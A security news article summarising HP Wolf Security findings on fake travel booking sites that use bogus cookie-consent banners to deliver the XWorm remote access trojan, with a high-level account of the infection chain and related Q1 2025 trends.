Security researchers at HP Wolf Security reported a significant uptick in cybercriminal campaigns leveraging fake travel websites to disseminate XWorm, a powerful remote access trojan (RAT).
These attacks are characterized by their use of convincing replicas of well-known travel booking platforms, such as Booking.com, designed to deceive users into initiating malware downloads under the guise of standard cookie consent procedures.
Attackers Mimic Popular Booking Platforms
Tapping into the “click fatigue” phenomenon induced by the ubiquity of cookie banners mandated for GDPR compliance the attackers have refined their social engineering tactics.
When a user visits one of these fraudulent sites, they are confronted with a cookie banner closely mimicking legitimate ones.
Unlike genuine banners, clicking “Accept” initiates a JavaScript download. The banner then simulates a loading icon and prompts the user to execute the file to complete the cookie acceptance process.
This rapid exploitation of user behavior, where individuals are eager to dismiss banners and proceed with bookings, substantially increases infection rates.
Once activated, the JavaScript covertly downloads two PowerShell scripts masked with .mp4 extensions to evade detection in network logs. These scripts then fetch and execute an additional .NET payload the process injector.
By embedding and compiling malicious code at runtime, the injector launches an instance of MSBuild.exe (a legitimate Microsoft .NET Framework process), into which it writes and executes the XWorm malware.
This technique not only facilitates stealth but also establishes persistence, ensuring the RAT remains active on the victim’s machine.
XWorm itself is notorious for its extensive features, which allow for remote control, data exfiltration, command execution, and additional payload deployment.
The campaign’s technical sophistication is underscored by its multi-stage infection methodology, memory injection techniques, and reliance on Windows process masquerading to evade traditional endpoint detection measures.
Advanced Social Engineering
HP Wolf Security’s threat researchers noted that this shift to cookie banner-based lures signals an evolution from earlier campaigns, such as those leveraging fake CAPTCHA challenges methods also recently observed in email-based malware propagation.
By capitalizing on routine user interactions with web security and privacy notifications, attackers are engineering novel attack vectors that bypass even advanced email gateways and endpoint protections.
Beyond travel website clones, Q1 2025 saw a broader trend in attackers abusing uncommon file types such as Windows library files (.ms-library) and Scalable Vector Graphics (.svg) to initiate infection chains.
These vectors, often delivered via spear-phishing emails, exploit features like WebDAV integrations and script obfuscation to trick users into executing malicious payloads disguised as regular documents or images.
Attackers continue to leverage trusted public infrastructure, such as GitHub and Azure Blob Storage, to host malware components and evade reputation-based filtering.
The effectiveness of these campaigns is stark: statistics from HP Sure Click indicate that email remains the dominant malware delivery vector, accounting for 62% of intercepted threats, while web downloads represent 23%.
The growing complexity and creativity of these campaigns reaffirm the necessity for heightened vigilance among users and the implementation of advanced threat isolation and endpoint protection technologies by organizations.
As cybercriminals innovate their social engineering toolkits and deployment methods, this latest wave of travel-themed malware campaigns exemplifies the persistent and adaptive nature of the modern cyber threat landscape placing both individual users and enterprises at increased risk, especially during periods of heightened travel activity.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
